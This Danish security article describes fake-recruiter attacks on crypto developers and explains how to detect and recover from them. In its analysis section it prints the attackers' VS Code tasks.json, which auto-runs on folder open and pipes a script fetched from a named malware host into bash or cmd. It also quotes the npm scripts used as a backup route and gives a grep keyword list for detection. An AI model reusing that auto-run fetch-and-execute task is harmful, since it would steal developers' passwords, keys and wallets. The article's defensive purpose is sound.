Smitsomt Interview: Hvordan falske rekrutterere hacker udviklere

Resumé: En ny bølge af statssponsorerede angreb rammer de bedste udviklere inden for krypto. Svindlere udgiver sig for at være rekrutterere eller CTO'er og tvinger kandidater til at åbne ondsindet kode. Denne artikel analyserer sagen "Martin Erazo", VS Code "tasks.json"-exploitet og den nødvendige "Burn Protocol" for at overleve.

Ansvarsfraskrivelse: Denne artikel rapporterer om cybersikkerhedshændelser, hvor rigtige personer imiteres. Navnene "Martin Erazo" og "Ara Vartanian" henviser til personaer brugt af angribere. Vi tror, at de rigtige personer med disse navne er uskyldige ofre for identitetstyveri.

---

---

1. Det Perfekte Offer: "Martin Erazo"-personaen

Det starter med en besked, der trykker på alle de rigtige knapper for en Senior Dev:

• Rolle: CTO / Lead Architect
• Budget: $6M finansiering sikret
• Teknologi: Web3, AI, Decentraliseret Infra

I et nyligt bekræftet angreb kontaktede en rekrutterer ved navn "Martin Erazo" via LinkedIn. Profilen brugte navn og billede fra en rigtig teaterinstruktør, men arbejdshistorikken var falsk og skiftede pludselig til "IT Project Management" i 2025 - et klassisk tegn på en kaptret eller købt konto.

Svindlen går hurtigt. De springer standard HR-screening over og går direkte til et "Teknisk Interview" med en høj chef - i dette tilfælde en efterligning af den rigtige branche-CTO Ara Vartanian (i øjeblikket hos Limit Break).

Rødt Flag: Projektnavne skifter konstant. Rekruttereren sælger "Betfin" (en GameFi-platform), men den tilsendte præsentation er for "SpaceXView" (et Metaverse-projekt). Denne inkonsekvens er et tegn på, at svindlere genbruger aktiver mellem kampagner.

2. Fælden: "Kan du gennemgå vores MVP-kode?"

Den falske "CTO" hævder, at de har brug for dine ekspertøjne til at gennemgå deres MVP (Minimum Viable Product) kode. De sender et GitHub Repo-link eller en ZIP-fil og presser dig til at åbne den under interviewet eller umiddelbart efter.

Det er her, hacket sker.

De udnytter din vilje til at hjælpe og dit ego. Du tror, du leder efter en bug i en React-komponent. I virkeligheden er "buggen" en "feature" designet til at stjæle din opsparing.

3. Teknisk Infiltration: Zero-Click Malware

Angribere bruger "zero-click" eller "low-click" exploits, der retter sig mod udviklerværktøjer. De behøver ikke, at du kører appen; blot at du åbner mappen.

Våbnet: .vscode/tasks.json

I dette specifikke tilfælde indeholdt Repot en forurenet .vscode/tasks.json. Denne fil fortæller VS Code, hvordan projektet skal bygges.

Ondsindet Kode:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": Dette er udløseren. I det øjeblik du åbner mappen i VS Code, kører denne opgave automatisk.
• Payload: Den bruger curl til at downloade et script fra vscodesettingtask.vercel.app - en kendt malware-host forklædt som et indstillings-API.
• Resultat: Scriptet kører i hukommelsen og stjæler øjeblikkeligt Chrome-adgangskoder, sessionscookies og SSH-nøgler.

Plan B: package.json scripts

Hvis VS Code-hacket mislykkes, har de npm-scripts:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

At køre npm install eller npm start udløser server/server.js - et lokalt C2 (Command and Control) script, der lækker dine Miljøvariabler (AWS-nøgler, Wallet seeds) til angriberen.

4. Røde Flag vs Grønne Flag

Hvordan opdager du det, før det er for sent?

Hvis du er en Dev, bør "Private Repos" eller ZIP-filer udløse alarmer på højeste niveau. Legitime firmaer bruger Offentlige Repos eller standardiserede testplatforme.

Advarsel: Dette er ikke den eneste måde at angribe Devs på. Læs om Samarbejdsfælden på Discord, og hvordan Supply Chain Attacks gør afhængigheder usikre.

5. Sikkerhedsprotokol: Sådan interviewer man sikkert

Hvis du er en Senior Dev, vil du blive jagtet. At hærde dit miljø er obligatorisk.

Protokol 1: "Burner" Miljø

Brug ALDRIG din primære arbejdsstation til kodetests.

• Virtuelle Maskiner: Brug VirtualBox eller VMWare.
• Cloud Dev Miljøer: Brug GitHub Codespaces eller Gitpod. Disse er kortvarige og isolerede fra dine lokale wallet-filer.

Protokol 2: Forensisk Revision

Før du åbner ukendt kode:

1. Tjek .vscode/tasks.json: Søg efter runOn: folderOpen.
2. Tjek package.json: Søg efter mistænkelige preinstall eller postinstall scripts.
3. Søgeord: grep efter curl, wget, os.homedir(), .ssh, wallet.

Protokol 3: VS Code Hærdning

Deaktiver "Workspace Trust" globalt.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
• Dette tvinger VS Code til at bede om tilladelse, før opgaver på mappeniveau køres.

6. Løsningen: "Burn Protocol"

Hvis du har åbnet et ondsindet Repo (som det sendt af "Martin Erazo"-personaen), antag at du er hacket. En rollback er ikke nok.

1. Afbryd: Træk stikket til netværket med det samme.
2. Brænd Wallets: Dine Private Nøgler er lækket. Opret nye wallets på en ren enhed (telefon) og flyt resterende midler. Brug aldrig den gamle seed igen.
3. Dræb Sessioner: Log ud af alle sessioner på Google, GitHub, AWS. Tilbagekald aktive tokens.
4. SSH Nøgle Audit: Tjek GitHub/GitLab-indstillinger. Angribere tilføjer ofte deres SSH-nøgler for at beholde bagdørsadgang. Slet det, du ikke genkender.
5. Nuke It: Slet disken og geninstaller operativsystemet. Det er den eneste måde at være 100% sikker på, at Rootkits er væk.

Konklusion

"Smitsomt Interview"-svindlen bruger din egen ekspertise mod dig. Den retter sig mod din vilje til at løse problemer. Men i Web3 er paranoia en professionel dyd. Verificer enhver identitet, sandkasse hvert repo, og stol aldrig på en "rekrutterer", der har travlt med at få dig til at køre kode.